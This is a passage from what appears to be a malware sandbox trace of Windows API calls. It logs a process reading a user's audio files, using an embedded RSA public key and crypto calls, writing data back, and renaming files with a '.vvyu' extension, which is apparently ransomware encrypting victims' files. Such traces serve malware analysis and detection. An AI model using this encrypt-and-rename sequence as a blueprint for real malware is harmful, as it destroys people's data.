dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.007] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0199.008] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0199.008] GetCurrentThreadId () returned 0x66c [0199.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0199.008] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea6190 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9648 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.009] GetCurrentThreadId () returned 0x66c [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.009] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0199.009] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0199.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0199.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0199.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccac38 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30f8 [0199.010] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.010] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3128 [0199.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0199.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3098 [0199.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85ac8 [0199.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0199.011] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0199.011] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30e0 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30c8 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3140 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0199.012] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0199.012] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83750 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3128 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30f8 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3140 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83750 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99c10 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0199.013] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3128 | out: hHeap=0x620000) returned 1 [0199.013] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0199.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0199.014] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0199.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0199.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0199.014] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0199.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0199.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0199.015] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0199.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.016] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0199.017] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0199.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0199.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0199.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0199.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cddbd0 | out: hHeap=0x620000) returned 1 [0199.018] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0199.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0199.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.019] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0199.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0199.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0199.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0199.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0199.020] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.021] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0199.021] WriteFile (in: hFile=0x510, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0xdce6, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0xdce6, lpOverlapped=0x0) returned 1 [0199.022] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0199.022] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0xdceb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.022] WriteFile (in: hFile=0x510, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0199.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0199.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0199.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0199.023] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0199.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.023] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.024] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0199.024] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0199.024] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0199.024] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0199.024] CloseHandle (hObject=0x510) returned 1 [0199.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4588 [0199.026] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x2ea6a68 [0199.026] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4588 | out: hHeap=0x620000) returned 1 [0199.026] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\FWxn.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\fwxn.wav"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\FWxn.wav.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\fwxn.wav.vvyu")) returned 1 [0199.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.028] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0199.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6a53e0 | out: hHeap=0x620000) returned 1 [0199.031] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7555f830, ftCreationTime.dwHighDateTime=0x1d89a4c, ftLastAccessTime.dwLowDateTime=0xd4eeb0, ftLastAccessTime.dwHighDateTime=0x1d8a485, ftLastWriteTime.dwLowDateTime=0xd4eeb0, ftLastWriteTime.dwHighDateTime=0x1d8a485, nFileSizeHigh=0x0, nFileSizeLow=0x1438a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KnG7feMIAKlEoa_UW1s2.wav", cAlternateFileName="KNG7FE~1.WAV")) returned 1 [0199.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x2ccac38 [0199.031] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0199.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccac38 | out: hHeap=0x620000) returned 1 [0199.031] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\KnG7feMIAKlEoa_UW1s2.wav") returned=".wav" [0199.032] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\BJHxLX\\KnG7feMIAKlEoa_UW1s2.wav" (normalized: "c:\\users\\keecfmwgj\\music\\bjhxlx\\kng7femiakleoa_uw1s2.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0199.032] GetFileSizeEx (in: hFile=0x510, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=82826) returned 1 [0199.032] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0199.035] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x14364, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0199.035] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0199.038] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.038] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.038] SetFilePointer (in: hFile=0x510, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0199.038] ReadFile (in: hFile=0x510, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1438a, lpOverlapped=0x0) returned 1 [0199.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.040] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2d0c3c8 [0199.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.040] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0199.040] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c0e0) returned 1 [0199.041] CryptCreateHash (in: hProv=0x67c0e0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0199.041] CryptHashData (hHash=0x2cfe1c0, pbData=0x2d0c3c8, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0199.041] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0199.041] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0199.041] CryptGetHashParam (in: hHash=0x2cfe1c0, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0199.041] GetLastError () returned 0x0 [0199.041] CryptDestroyHash (hHash=0x2cfe1c0) returned 1 [0199.041] CryptReleaseContext (hProv=0x67c0e0, dwFlags=0x0) returned 1 [0199.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0199.042] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0199.042] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0199.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.042] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0199.042] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0199.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd96b8 [0199.042] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14390) returned 0x2ea79b0 [0199.043] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0199.043] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddbd0 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2cddc18 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30b0 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0199.043] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0199.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0199.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0199.044] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0199.044] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0199.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0199.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0199.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30e0 | out: hHeap=0x620000) returned 1 [0199.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0199.044] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea30e0 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a00 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3080 [0199.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 